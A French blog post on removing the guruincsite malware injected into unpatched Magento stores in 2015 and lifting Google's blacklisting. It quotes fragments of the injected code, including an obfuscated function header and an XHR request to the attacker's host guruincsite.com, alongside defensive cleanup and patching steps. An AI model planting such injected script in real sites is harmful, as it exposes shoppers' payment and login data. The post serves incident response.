Accueil / A la une / Comment nettoyer Magento infecté par le malware guruincsite et enlever le blacklist de Google

Comment nettoyer Magento infecté par le malware guruincsite et enlever le blacklist de Google

La plateforme e-commerce Magento connaît depuis quelques jours (cela a vraisemblablement commencé le 17 octobre) une vague d’attaque visant à récupérer les informations bancaires ou de connexion des visiteurs à l’aide d’exploit kit.

Ce que l’on sait aujourd’hui :

  • Google a déjà blacklisté plus de 8 500 sites infectés.
  • Les hackers injectent du code malicieux pointant vers guruincsite[.]com
  • Le dernier exploit kit utilisé est « Neutrino Exploit Kit« 

Le Neutrino Exploit Kit exploite la vulnérabilité Shoplift qui est patché dans la release du 9 février 2015. Comme quoi il est réellement VRAIMENT important de faire ses mises à jour.

Le code malicieux de guruincsite

Il y a deux variations de ce code malicieux.

  • Le premier est un code obfuscated avec une fonction LCWEHH(XHFER1) {XHFER1=XHFER1 

obfuscated-guruincsite-script

  • Le deuxième en clair nous indique xhr.open(‘GET’, ‘http://guruincsite.com/1.php’

simple-guruincsite-site

L’impact de guruincsite sur Google

Google aurait recenser plus de 8000 sites infectés par ce Malware. Les propriétaires des sites web ont vu l’alerte « The site ahead contains malware » dans leur navigateur. Ils ont aussi vu dans les résultats de recherche « Malicious software is hosted on 1 domain(s) » ou encore eu un mail de Google Webmaster Tools avec pour sujet « [Webmaster Tools] Malware infection detected« .

magento-malware

Nettoyer guruincsite de Magento

Le Malware infecte la page d’accueil et le footer.

Retirer guruincsite de la page d’accueil de Magento

Le code malicieux « lisible » est inséré sur la page d’acceuil il ressemble à la deuxième capture d’écran vu plus haut, en voilà une deuxième :

magento-store-Guruincsite-home-malware

Pour retirer le malware, il faut éditer la page d’accueil en allant dans CMS -> Pages -> Home -> Content et supprimer le code malicieux comme montré ci-dessous :

magento-store-Guruincsite-home

Retirer guruincsite du footer de Magento

Le code retrouvé dans le footer est souvent le code obfuscated (obscurci, comprendre « crypté ») :

magento-store-Guruincsite-footer-malware

Pour retirer ce malware, il faut éditer le footer en allant dans :

System > Configuration > Design > Footer > Miscellaneous HTML dans le panneau d’administration et supprimer le code malicieux comme ci-dessous :

magento-store-Guruincsite-footer

A plusieurs reprises il a été vu de multiple compte administrateur et des urls d’hameçonnage dans des fichiers se trouvant dans le dossier var de Magento. Si c’est votre cas, pensez à les retirer.

Enfin, scanner le site et re-contrôler

Une fois que tout le code malicieux a été retiré et les caches vidés (cache de Magento mais aussi le cache système comme Varnish, APC cache, etc.) assurez-vous qu’il ne reste que des fichiers cleans sur le site. Si vous utilisez un outil de versioning comme git vous pouvez vous en servir pour comparer ces fichiers.

Dans certains cas, il se peut que vous disposiez de backup clean vieux de seulement quelques heures. Vous pouvez alors vous en servir pour restaurer votre site web.

Enlever le blacklistage de Google

Une fois que vous êtes sûr que tous les malwares ont été retirés, vous pouvez utiliser Google Webmaster Tools pour faire connaître à Google que votre site est de nouveau clean. Cela peut prendre 4 heures pour que Google remette votre site en ligne.

Prévenir d’une ré-infection

Tous les sites affectés utilisés une ancienne version de Magento. La dernière est la version 1.9.2.1. Si votre site n’en est pas à cette version ou que vous n’avez pas appliqué les patchs de sécurités depuis des mois, alors votre site est sans doute vulnérable.

Plus d’infos :

https://blog.malwarebytes.org/exploits-2/2015/10/new-neutrino-ek-campaign-drops-andromeda/

https://blog.sucuri.net/2015/10/massive-magento-guruincsite-infection.html

http://malware-traffic-analysis.net/2015/10/21/index.html

https://magento.com/security/news/important-security-update

https://magento.com/security-patch

https://www.spiralmedia.co.uk/magento-guruincsite-neutrino-threat/

https://bobcares.com/blog/how-to-clean-guruincsite-malware-from-hacked-magento-web-sites-and-remove-google-blacklisting/

A propos de Anthony

Anthony
Passionné d'informatique depuis tout petit, j'ai d'abord commencé par le développement Web en autodidacte puis j'ai poursuivi des études en sécurité systèmes et réseaux.

Voir aussi

Vérifier et corriger ses pixels

Cela arrive qu’un pixel soit défectueux. Des fois on y fait pas attention, puis un …